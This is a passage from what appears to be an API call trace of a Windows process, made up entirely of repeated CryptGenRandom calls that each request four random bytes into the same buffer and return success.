[0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.409] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.410] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 